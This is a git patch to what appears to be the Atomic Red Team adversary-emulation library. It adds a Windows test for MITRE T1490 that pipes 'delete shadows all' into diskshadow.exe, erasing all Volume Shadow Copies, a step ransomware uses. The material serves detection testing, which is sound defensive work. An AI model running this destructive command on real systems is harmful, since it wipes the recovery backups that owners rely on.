From 256876632cd5b5eff495ef5ff57bd3c0ca30be48 Mon Sep 17 00:00:00 2001
From: cyb3rjy0t <harjot1436@gmail.com>
Date: Wed, 7 Jan 2026 02:30:15 -0500
Subject: [PATCH] Update T1490 to include Diskshadow.exe test (#3253)

Co-authored-by: Bhavin Patel <bhavin.j.patel91@gmail.com>
Co-authored-by: Copilot <175728472+Copilot@users.noreply.github.com>
---
 atomics/T1490/T1490.yaml | 18 ++++++++++++++++++
 1 file changed, 18 insertions(+)

diff --git a/atomics/T1490/T1490.yaml b/atomics/T1490/T1490.yaml
index 5bedb437..35cb2539 100644
--- a/atomics/T1490/T1490.yaml
+++ b/atomics/T1490/T1490.yaml
@@ -184,3 +184,21 @@ atomic_tests:
     cleanup_command: sudo tmutil enable
     name: sh
     elevation_required: true
+- name: Windows - Delete Volume Shadow Copies via Diskshadow
+  description: |
+    Deletes Windows Volume Shadow Copies via Diskshadow binary. This technique is used by numerous ransomware families such as Crytox. The binary is present by default in Windows Server operating systems (since Windows Server 2008). Upon execution, it will delete all shadow copies of the server.
+  supported_platforms:
+  - windows
+  dependency_executor_name: powershell
+  dependencies:
+  - description: |
+      Create volume shadow copy of C:\ . This prereq command only works on Windows Server or Windows 8.
+    prereq_command: |
+      if(!(vssadmin.exe list shadows | findstr "No items found that satisfy the query.")) { exit 0 } else { exit 1 }
+    get_prereq_command: |
+      vssadmin.exe create shadow /for=c:
+  executor:
+    command: |
+      "delete shadows all" | diskshadow.exe
+    name: powershell
+    elevation_required: true